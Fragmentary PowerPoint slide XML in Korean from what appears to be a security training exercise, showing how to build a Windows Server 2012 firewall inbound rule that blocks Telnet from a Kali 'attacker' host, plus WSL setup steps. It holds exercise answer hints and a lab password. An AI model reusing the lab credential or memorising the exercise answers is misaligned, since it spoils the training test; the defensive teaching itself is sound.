          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6987424" y="5701364"/>
            <a:ext cx="4008120" cy="29718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10731390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10.10.1.133(NIS Client)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>telnet </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 접속 시 연결이 되지 않는 것을 확인 할 수 있다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>빨간 네모박스로 체크되어 있는 부분이 정답 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>( 3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>가지 모두 입력 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>* Ctrl + C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>를 실행하여 중지 후 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>check </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>실행 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod" startAt="10"/>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1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C1E5CCDB-9CC5-4803-9411-50A1ADFD5FBE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="500498" y="913875"/>
            <a:ext cx="5400040" cy="1267460"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F36CA39-6F04-4C6E-AD79-7631493BE6B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7299844" y="687815"/>
            <a:ext cx="3383280" cy="14935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68935266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/Training/Unit/Net/6</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> 6. IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> 접근 통제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특정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허용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제한 설정이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방화벽의 설정을 이용하여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Telnet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접속을 시도하는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navy03</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인 바운드 규칙을 생성하여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Ctrl + Alt + Delete (x) / Ctrl + Alt + Insert (o)</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 1q2w3e4r%%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바운드 규칙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새 규칙</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통제 설정을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Attacker(Kali Linux)</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Victim(Windows Server 2012)</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281791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1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>패킷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ethernet </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>더블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규칙 생성 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>(GUI)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>제어판 열기</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p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>   windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>방화벽 클릭</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5" name="_x211874280">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA46D554-C5B0-4946-A59E-0441C9B687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784" y="693369"/>
            <a:ext cx="5400675" cy="33845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BBA00F9E-D9C6-4FC2-88C2-56579A615ECA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="520784" y="407791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7" name="_x211874280">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73B99A7A-88FE-415A-808F-82938291BF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784" y="4535119"/>
            <a:ext cx="5400675" cy="1619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6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0492EF37-293F-4466-9563-4071B316C52A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6270541" y="3689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9" name="_x211873800">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E9DC035-C6F4-4A33-99CB-640D4F03C14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 t="21556" r="423" b="28806"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6293353" y="914399"/>
            <a:ext cx="5377863" cy="165318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8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C55D6D5A-C7AF-45AC-9633-62BB28453D29}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6334873" y="25675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31" name="_x211874200">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2B9F23B-7E9C-48A4-92F9-73F8B49EF0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4873" y="3024786"/>
            <a:ext cx="5400675" cy="3128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762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14. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>다음 명령어를 입력하여 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>ubuntu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>wsl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>버전을 바꾸어 준다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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>–set-version </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ubuntu 2</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15. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>변환이 완료되었다면 다음 명령어를 통해 다시 버전을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16. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>터미널 상단의 아래방향 화살표를 클릭하여 우분투를 실행시켜준다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4" name="그림 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E016D262-6A80-4496-99A3-1059CACBDDAD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="494988" y="930287"/>
            <a:ext cx="5358508" cy="380343"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="그림 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC90362A-9EB0-47A4-BA96-C6F1AE41359E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="494988" y="1657698"/>
            <a:ext cx="5358508" cy="281007"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="그림 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F6F4EA75-F855-4389-BDA2-2E04CBBBC643}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1733716" y="2412911"/>
            <a:ext cx="2216085" cy="1511668"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="직사각형 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB724B66-D492-420F-ABC3-10612DD47583}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="494987" y="930287"/>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8957085D-5365-4785-93C8-5CF8A88C6310}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="494986" y="1656586"/>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285495B9-700B-4E90-B4DD-E987C8F30717}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2469511" y="3145119"/>
            <a:ext cx="1421695" cy="1520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hlinkClick r:id="rId5"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664045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고급 설정</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인 바운드 규칙</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새 규칙</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49" name="_x211875000">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FFB59DC4-9219-4BDA-8453-78F8AAC025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7314"/>
            <a:ext cx="5400675" cy="4037013"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2051" name="_x211874760">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{492C2927-EFE9-476D-A971-9600B1B50C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6022" y="687314"/>
            <a:ext cx="2468563" cy="23241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_x211873080">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C4B7735-CD6A-4C5C-93DD-7A410CA780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632" y="3468614"/>
            <a:ext cx="2430463" cy="2430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54407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규칙 종류</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>사용자 지정</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>선택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모든 프로그램 선택 후 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>다음</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프로토콜 종류 중 모두를 선택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 다음 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>주소 로 선택 후 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>다음</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>]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3" name="_x211874440">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C423ED7-2D48-4C5F-A839-72D1CD229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729" y="632814"/>
            <a:ext cx="5400675" cy="2382838"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3075" name="_x211873320">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B7381F64-7CFF-4109-8CBF-7DCC4F5E48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729" y="3428998"/>
            <a:ext cx="5400675" cy="2290763"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3077" name="_x211874600">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3DF16199-FE85-4508-8604-66382E07878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35" b="21331"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6276596" y="632814"/>
            <a:ext cx="5371809" cy="2382838"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3079" name="_x211874600">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B73FB42-87A4-4D23-95D3-E8518DEAE3A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1032" b="14259"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6276596" y="3438250"/>
            <a:ext cx="5456401" cy="2597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18975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추가 선택 후 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>192.168.10.10 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>입력 후 ‘다음 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>IP’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>생성되었는지 확인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 연결 차단 선택 후 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>다음</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모두 선택 후 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>다음</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ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>이름 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>navy03 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>입력 후 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>마침</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>] </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7" name="_x211873560">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A6EFC7D-EDD5-402B-BFCB-560B9BF0C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79" y="606356"/>
            <a:ext cx="5400675" cy="3014663"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4099" name="_x211873320">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B78C808-CF0C-431C-9ADD-AA14769882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178" y="3858377"/>
            <a:ext cx="5400675" cy="2447925"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4101" name="_x211874840">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{31D752F7-7FE9-4645-A8B6-A40FEBDB1A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606356"/>
            <a:ext cx="5400675" cy="2185988"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4103" name="_x211874600">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C977BE25-CB80-48A4-B436-617B4C1C05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5" y="3230631"/>
            <a:ext cx="5400675" cy="3021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59123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err="1"/>
              <a:t>인바운드</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> 규칙에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>navy03 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>규칙이 생성된 것을 확인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windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>방화벽에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>방화벽 설정 또는 해제 선택</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1" name="_x211873800">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5EF525D-E9B9-4814-B67B-24CF84FCE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50980"/>
            <a:ext cx="5400675" cy="3887788"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5123" name="_x211874280">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F09131E6-B313-46ED-BDB5-64083DD1ECE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4716"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6291147" y="650980"/>
            <a:ext cx="5400674" cy="2637227"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5125" name="_x211873800">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
